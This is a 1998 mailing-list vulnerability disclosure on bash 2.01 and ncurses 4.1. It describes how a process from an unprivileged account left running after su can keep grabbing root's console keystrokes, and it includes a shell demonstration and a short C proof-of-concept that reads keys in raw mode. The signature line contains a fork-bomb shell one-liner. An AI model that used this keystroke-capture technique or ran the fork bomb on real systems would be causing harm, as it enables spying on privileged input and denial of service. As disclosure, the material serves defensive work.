bash 2.01 / ncurses 4.1 console takeover "feature"

Michal Zalewski (lcamtuf@BOSS.STASZIC.WAW.PL)
Sat, 07 Mar 1998 21:06:21 +0100

With bash 2.01 and ncurses 4.1, any program launched at unprivledged
uid (eg. from 'su' shell) may takeover privledged user's console
(to grab keystorkes or something else). I found it's quite easy when
I tried to kill 'su' directly from unprivledged shell with signal 9:

[root@genome /]# su lcam
[lcam@genome /]$ killall -9 su
Killed
[root@genome /]#

That was normal, but suddenly I saw again old prompt:

[lcam@genome /]$

>From this point, two bash instances (unprivledged one hasn't been
killed with su!) were controlling my console at once... It looks
just curious:

[root@genome /]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[lcam@genome /]$ id
uid=502(lcam) gid=502(lcam) groups=502(lcam)
[lcam@genome /]$
[root@genome /]#

Of course, it isn't so scary, because it has been done manually...
But is can be easily used in nasty program. Typical administrator
believes that only unprivledged account may be compromised when
he's launching something on it, and usually he's right, but
ncurses has a vunerability which may be used to fool him. Unlike
other lame su tricks, it's quite invisible (he may check on a
second console - he's back in his REAL, root shell, but we can
still control his console). I wrote simple program (it may be even
aunched from ~/.bashrc; in the meantime, su should be killed), which
is able to grab keystorke(s) from console:

-- test.c --
// gcc test.c -lncurses -oanything
#include <curses.h>
int main() {
initscr();
noecho();
raw();
while (1) if (getch()=='x') system("touch /tmp/VOILA");
}
-- eof --

It isn't perfect, actually it grabs only one of first 'x's, and fail
to grab next ones (a lot of i/o errors when debugged ;-). But it
CAN do that. For sure it's possible to keep control much longer, as
shown above (bash example). Maybe it's even possible to do it even
after logout, I not checked it.

_______________________________________________________________________
Micha³ Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
Iterowaæ jest rzecz± ludzk±, wykonywaæ rekursywnie - bosk± [P. Deustch]
=--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=